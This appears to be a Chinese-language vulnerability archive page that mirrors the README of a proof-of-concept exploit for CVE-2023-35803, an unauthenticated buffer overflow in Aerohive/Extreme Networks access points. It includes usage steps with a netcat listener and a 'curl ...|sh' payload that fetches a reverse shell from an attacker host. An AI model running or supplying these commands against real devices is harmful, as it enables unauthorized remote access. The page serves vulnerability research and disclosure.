关联漏洞
Description
PoC Exploit for CVE-2023-35803 Unauthenticated Buffer Overflow in Aerohive HiveOS/Extreme Networks IQ Engine
介绍
## CVE-2023-35803 - Unauthenticated RCE in Extreme Networks/Aerohive Wireless Access Points
PoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.
1. Edit `revshell` to point to your shell catcher IP/port
2. Host the reverse shell: `python3 -m http.server`
3. Open a shell catcher: `nc -lvnp 1337`
4. Run the POC (may take a few minutes): `python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"`
---
Writeup here: [https://research.aurainfosec.io/pentest/bee-yond-capacity/](https://research.aurainfosec.io/pentest/bee-yond-capacity/)
<img src="https://research.aurainfosec.io/pentest/bee-yond-capacity/featured.png" width=250 />
文件快照
[4.0K] /data/pocs/596398d9cee28446ca0b1718c1fa41d42cca5b51
├── [ 20M] gdbstatic
├── [1.7K] poc.py
├── [ 660] README.md
└── [ 122] revshell
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →